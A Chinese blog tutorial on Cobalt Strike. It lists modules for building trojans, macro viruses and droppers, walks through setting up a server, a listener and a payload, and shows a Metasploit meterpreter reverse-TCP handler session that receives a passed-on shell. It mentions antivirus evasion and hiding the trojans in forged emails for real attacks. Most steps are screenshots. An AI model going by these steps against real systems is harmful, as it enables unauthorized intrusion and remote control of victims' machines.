【Cobalt strike 渗透测试神器】

目录

一、前言

安装包下载

主机详情

二、部分模块和Payload介绍

三、基本使用步骤

1. 服务端和客户端

2. 设置监听

四、配合其他工具反弹shell

1.  kali中使用msf

2.  CS创建监听

3. metasploit使用exploit 模块


一、前言

     Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具i并且在攻防测试团队协作方面堪称利器,因此广受黑客喜爱。Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但要想好玩的话,一定要架设在外网上

安装包下载

官网下载: ​​​​​https://www.cobaltstrike.com

博主资源免费下载:https://download.csdn.net/download/qq_55213436/85003580

主机详情

公网服务器:IP地址---:47.108.44.4       操作系统:Linux。

客户端:IP地址---:192.168.43.114        操作系统:Windows。

受害机:IP地址---:192.168. 175.146     操作系统:win7。

二、部分模块和Payload介绍

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

1-Cobalt Strike
New Connection 新建连接,支持连接多个服务器端
Preferences 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization主要展示输出结果的视图
VPN Interfaces设置VPN接口
Listenrs  创建监听器
Script Manager脚本管理,可以通过AggressorScripts脚本来加强自身,可以扩展菜单栏,Beacon命令行,提权脚本
Close退出
2-View
Applications 显示受害主机的应用信息
Credentials  显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
Downloads 查看已下载文件
Event Log 主机上线记录以及团队协作聊天记录
Keystrokes 查看键盘记录结果
Proxy Pivots  查看代理模块
Screenshots 查看所有屏幕截图
Script Console  加载第三方脚本以增强功能
Targets 显示所有受害主机

    

3-Package
HTML Application生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件
MS Office Macro生成office宏病毒文件
Payload Generator生成各种语言版本的payload
USB/CD AutoPlay生成利用自动播放运行的木马文件
Windows Dropper  捆绑器能够对任意的正常文件进行捆绑
Windows Executable生成可执行exe木马
Windows Executable(Stageless生成无状态的可执行exe木马

                                      

4-Reporting
Activity Report 活动报告
Hosts Report 主机报告
Indicators of Compromise  IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
Sessions Report  会话报告
Social Engineering Report   社会工程报告:包括鱼叉钓鱼邮件及点击记录
Tactics, Techniques, and Procedures   战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
Reset Data   重置数据
Export Data  导出数据,导出.tsv文件格式

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

三、基本使用步骤

1. 服务端和客户端

启动服务端

进入到CS的安装目录下,执行如下的操作:
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

客户端上线,打开CS的Windows客户端程序,即cobaltstrike.exe,后输入如下信息:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

成功连接上公网的CS服务器
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

2. 设置监听

创建监听器:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

3. 创建payload 

创建payload,等待目标主机上线。在本次演示实验中,关闭所有的杀毒软件和firewall。在实际的攻击过程中,我们肯定是要对payload做“免杀”来规避杀毒软件的检测,具体的免杀操作和规避杀毒软件的监测后续会有相应的介绍。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

 木马程序如下:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

运行对应的木马程序,则可以在CS的客户端返回对应的受害机的相关信息:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

拿到主机的权限后就可以执行后渗透操作:
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

其实我们可以结合其他的方式来增加攻击的隐蔽性和跨时空性。如:结合伪造邮件、嵌入到隐蔽的文件中。

四、配合其他工具反弹shell

此处以CS配合metasploit实现反弹shell,达到能够使用metasploit的相应工具实现对目标主机的渗透操作。(效果很棒!)

1.  kali中使用msf

──(root💀kali)-[~]
└─# msfconsole
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.1.14-dev                          ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 47.108.217.53 
lhost => 47.108.217.53
msf6 exploit(multi/handler) > set lport 66
lport => 66
msf6 exploit(multi/handler) >  

2.  CS创建监听

    使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。(在下这儿截错图啦:下面的第一张图中HOST的IP地址应该为kali的IP地址!!!)

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

然后选择我们之前创建的:Windows/foreign/reverse_http选项,点击choose。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

3. metasploit使用exploit 模块

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

使用命令:输入shell命令后 ,进入dos界面,输入命令:chcp 65001即可解除乱码。

至此CS配合metasploit就成功啦。我们可以使用metasplit上的工具进行愉快的玩耍啦。

  (CS还有很多非常棒的功能:如构建隧道等后期还应该加强对其学习和深入利用。)

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值